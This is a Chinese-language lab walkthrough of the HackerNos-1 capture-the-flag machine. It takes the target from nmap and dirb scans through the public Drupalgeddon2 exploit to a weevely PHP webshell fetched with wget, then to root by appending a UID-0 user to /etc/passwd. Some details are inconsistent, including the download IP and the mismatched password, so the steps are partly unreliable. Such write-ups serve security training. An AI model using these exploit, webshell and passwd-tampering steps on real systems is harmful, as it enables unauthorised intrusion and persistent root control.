HackerNos-1靶場

zxc05060513發表於2020-11-09

HackerNos-1

靶機ip:192.168.9.41
攻擊機ip(kali):192.168.9.31

1.資訊收集:

nmap -sn 192.168.9.0/24
nmap -A -v 192.168.9.41 

在這裡插入圖片描述
在這裡插入圖片描述

2.掃描目錄:

dirb http://192.168.9.41/drupal

在這裡插入圖片描述

3.在github中找到關於drupal的cms漏洞溢位

找到的連線為: https://github.com/dreadlocked/Drupalgeddon2

在這裡插入圖片描述

在kali中下載克隆這個漏洞環境:

git clone https://github.com/dreadlocked/Drupalgeddon2

然後下載一個庫:

gem install highline

在這裡插入圖片描述

4.獲取一個低許可權的shell

cd /dreadlocked
./dreadlocked2.rb http://192.168.9.41/drupa
```![在這裡插入圖片描述](https://img-blog.csdnimg.cn/20201109230535565.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2NTI3MDgw,size_16,color_FFFFFF,t_70#pic_center)

在低許可權的shell中返回上一級不能成功執行,證明沒得到最高許可權
**5.許可權維持**
先寫一個木馬檔案在kali裡面

```bash
weevely generate zxc ./zxc.php

在這裡插入圖片描述

然後建立一個python服務:

python2 -m SimpleHTTPServer 8080

在這裡插入圖片描述

然後在低許可權的那個shell中下載這個木馬

wget http://192.168.9.41:8080/zxc.php

在瀏覽器中測試這個木馬是否上傳成功,空白頁證明上傳成功了
再用本機終端連線測試:

weevely  http://192.168.9.41/drupal/z1.php 123456

在這裡插入圖片描述

6.提權:
檢視一個檔案

cat alexander.txt

在這裡插入圖片描述

然後是base64加密,因為他有兩個等於號
解密出來是brainfuck值,然後再解密

https://www.dcode.fr/brainfuck-language  //brainfuck的解碼工具

在這裡插入圖片描述

獲取使用者名稱和密碼
james :Hacker@4514
下載passwd檔案

file_download passwd /root/桌面/passwd

建立一個新的密碼檔案

openssl passwd -1 -salt salt 123456

在這裡插入圖片描述

寫入密碼和使用者名稱:

echo 'chao:$1$salt$638tR8bROOvPnPklDQ9Vf.:0:0::/root/:/bin/bash'>>passwd

在這裡插入圖片描述

如果echo不行可以直接複製

在msf5中進行
(查詢模組省略,看截圖)
在這裡插入圖片描述

所有引數配置好之後然後run 然後shell
然後python3

python3 -c 'import pty;pty.spawn("/bin/bash")'

進入之後再shell

然後成功彈出shell
在這裡插入圖片描述

切換使用者

su chao
passwd:zxczxc

在這裡插入圖片描述

進入之後id
證明提權成功獲取最高管理員許可權